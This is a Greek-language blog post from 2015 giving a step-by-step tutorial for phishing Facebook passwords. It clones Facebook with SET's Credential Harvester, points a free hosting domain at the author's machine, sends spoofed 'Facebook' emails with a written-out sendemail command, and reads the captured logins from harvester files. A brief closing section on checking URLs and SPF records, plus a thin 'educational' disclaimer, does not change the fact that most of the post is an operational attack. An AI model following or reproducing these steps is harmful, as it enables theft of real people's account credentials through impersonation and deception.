ΠΡΟΣΟΧΗ

Προσοχή! Οι οδηγοί μου είναι μόνο για εκπαιδευτικούς σκοπούς,
εφαρμόζοντας τους κακόβουλα σε τρίτους είναι με δικιά σας ευθύνη καθώς ορισμένοι απο αυτούς είναι παράνομοι

Σάββατο, 14 Φεβρουαρίου 2015

Πως κλεβουμε κωδικους Facebook(Expert Facebook Phising)



Τι θα χρειαστειτε;

1.Kali Linux

Πριν ξεκινησουμε παταμε εδω

Δημιουργουμε ενα λογαριασμο
Οταν κανετε επιβεβαιωση λογαριασμου τοτε επιλεξτε φιλοξενια


επιλεγουμε Δωρεαν και παραγγελια
δινουμε οποιοδηποτε ονομα στο sub domain βαζουμε κωδικο,επιλεγουμε συνεχεια


Επιλεγουμε Δεχομαι τους Ορους και μετα παραγγελια


θα μας εμφανισει οτι ο λογαριασμος δημιουργηθηκε επιτυχως


μετα ανοιγουμε ενα τερματικο και γραφουμε

curl ifconfig.me

ωστε να δουμε ποια ειναι η εξωτερικη μας ip


*σημειωνουμε καπου αυτη την ip πχ 189.χχ.χχ.χχ.45
μετα γραφουμε

ifconfig

ωστε να δουμε την εσωτερικη μας ip


*σημειωνουμε καπου την εσωτερικη μας ip πχ 192.168.1.20

πηγαινουμε στο router  μας ,εκει που λεει Firewall επιλεγουμε dmz ,δεξια βαζουμε την εσωτερικη μας ip και αποθηκευουμε την ρυθμιση


*μπορειτε να προωθησετε την θυρα 80 αν δεν εχει dmz το router σας*

τωρα ανοιγουμε ενα τερματικο και γραφουμε setoolkit

επιλεγουμε 1) Social-Engineering Attacks)

επιλεγουμε 2) Website Attack Vectors

επιλεγουμε 3) Credential Harvester Attack Method

επιλεγουμε 2) Site Cloner

βαζουμε την εξωτερικη μας ip

 γραφουμε την ιστοσελιδα που θελουμε να αντιγραψουμε


το SET αντιγραφει το facebook και ανοιγει τον apache web server μας


τωρα για να επιβεβαιωσουμε οτι ολα ειναι ενταξει γραφουμε στην url την εσωτερικη μας ip και θα μας ανοιξει την σελιδα τοπικα πχ


τωρα πηγαινουμε στο hostinger και αντιγραφουμε το domain που εχουμε φτιαξει

πχ

στο τερματικο γραφουμε

nano /var/www/index.html

παταμε ctrl+w και μετα ctrl+R ωστε να κανουμε αναζητηση και αντικατασταση
γραφουμε την εξωτερικη μας ip πχ http://1.xx.xx.xx.4/post.php

παταμε enter και γραφουμε το domain που φτιαξαμε με το hostinger πχ http://domain_diko_sas/post.php

παταμε παλι enter μας εχει βρει την ip και επιλεγουμε Y για να γινει αντικατασταση

παταμε ctrl+x για να κλησει ,θα μας ρωτησει αν θελουμε να αποθηκευτει παταμε Y και enter

 τωρα πηγαινουμε στο hostinger στις επιλογες πηγαινουμε προχωρημενο και  μετατροπεας DNS ζωνης

στο A(Host) στη πρωτη γραμμη (@) επιλεγουμε επεξεργασια κατω που λεει point to και βαζουμε την εξωτερικη μας ip πχ


μετα βαζουμε στην url το domain μας και μας ανοιγει την ψευτικη σελιδα του facebook πχ

 *αν δεν μας την ανοιξει η το A record δεν εχει μεταφερθει στην ip μας απο το hostinger ,η δεν εχετε προωθησει την θυρα 80 στο router*

τωρα παλι στις επιλογες του  hostinger πηγαινουμε στην διαχειριση email βαζουμε ενα ονομα κωδικο και επιλεγουμε δημιουργια

και οταν δημιουργηθει επιτυχως

κραταμε το email και τον κωδικο μας

Τωρα για να αρχισουμε την επιθεση κατεβαζουμε 2 αρχεια.txt

1.κειμενο αναφορας πατηστε εδω
2.αιτημα φιλιας πατηστε  εδω

τωρα εφοσον εχουμε κατεβασει και τα 2 αρχεια κειμενου (.txt) τα μεταφερουμε στην επιφανεια εργασιας μας

ανοιγουμε ενα τερματικο και γραφουμε

nano /root/Desktop/accountverification.txt

παταμε ctrl+w μετα ctrl+R και γραφουμε onoma_tou_domain_sas πχ


για παραδειγμα το δικο μου

θα μας ρωτησει αν θελουμε να κανουμε αντικατασταση και εμεις θα επιλεξουμε A (για ολα) μετα παταμε ctrl+x επιλεγουμε y και παταμε enter για να αποθηκευση

το ιδιο κανουμε και με το αλλο αλλο αρχειο τρεχουμε την εντολη

nano /root/Desktop/friendrequest.txt

και ακολουθουμε την ιδια διαδικασια ωστε να κανετε αντικατασταση κτλ

τωρα γραφουμε στο τερματικο

sendemail -f "Facebook <facebook@mailfacebook.com>" -t thyma@gmail.com -u Facebook -o message-file=/root/Desktop/accountverification.txt -o message-content-type=html -s mx1.hostinger.gr:2525 -xu friend@acceptfriend.wc.lt -xp κωδικος


οπου
-f "ονομα <email αποστολεα>" *βαζετε οτι θελετε*
-t email θυματος
-u Θεμα του  μηνυματος
-ο massage-file=ετοιμο αρχειο κειμενου
-ο massaage-content-type=html δλδ οτι το ετοιμο μηνυμα που καταβασατε οτι ειναι html
-s mx1.hostinger.gr:2525 διακομηστης και θυρα (στο hostinger ειναι τα ιδια)
-xu χρηστης (εσεις βαζετε το email που φτιαξατε με το hostinger)
-xp ο κωδικος που βαλατε οταν φτιαξατε το email στο hostinger

στο email του θυματος στα εισερχομενα θα του εμφανιστει αυτο


και αν παλι στο τερματικο γραψουμε


στο email του θυματος θα του εμφανιστει αυτο


τωρα αν το θυμα πατησει σε ενα απο τους 2 συνδεσμους θα ανακατευθυνθει στην ψευτικη σελιδα του facebook πχ


οταν πληκτρολογισει τα κρητηρια συνδεσης του θα μας αποθηκευτουνε

για να τα δουμε απλα γραφουμε σε ενα τερματικο

cat /var/www/harvester*.txt



Πως θα προστατευτειτε;

1.Παντα να κοιτατε την url αν δεν λεει https://www.facebook.com τοτε δεν ειναι το facebook
2.Αν παρετε καποιο email επιλεξτε  Show origin για να δειτε απο που ηρθε αυτο το email και αν εχει περασει το SPF


και οπως βλεπετε ο αποστολεας δεν εχει περασει το SPF (Sender Policy Framework)και δεν ειναι καθορισμενος αποστολεας
Το SPF record με λιγα λογια ειναι οι εγγραφες που εχει ο καθε ιδιοκτητης Domain για να αφηνει μια ip να στελνει email για αυτον πχ το www.facebook.com εχει δικιες του προκαθορισμενες ip, αυτο το κανουνε για μειωσουνε τους spammers,hackers  κτλ
στο δικο μας παραδειγμα ποιο πανω δεν υπαρχει καποιο SPF record οποτε γιαυτο εβγαλε none και πηγε το email πχ






Δεν υπάρχουν σχόλια: